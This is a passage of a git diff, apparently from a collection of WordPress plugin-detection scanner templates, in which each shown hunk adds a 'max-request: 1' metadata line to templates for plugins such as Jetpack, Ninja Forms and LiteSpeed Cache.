b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 88d38e21ed..23a88ea130 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ 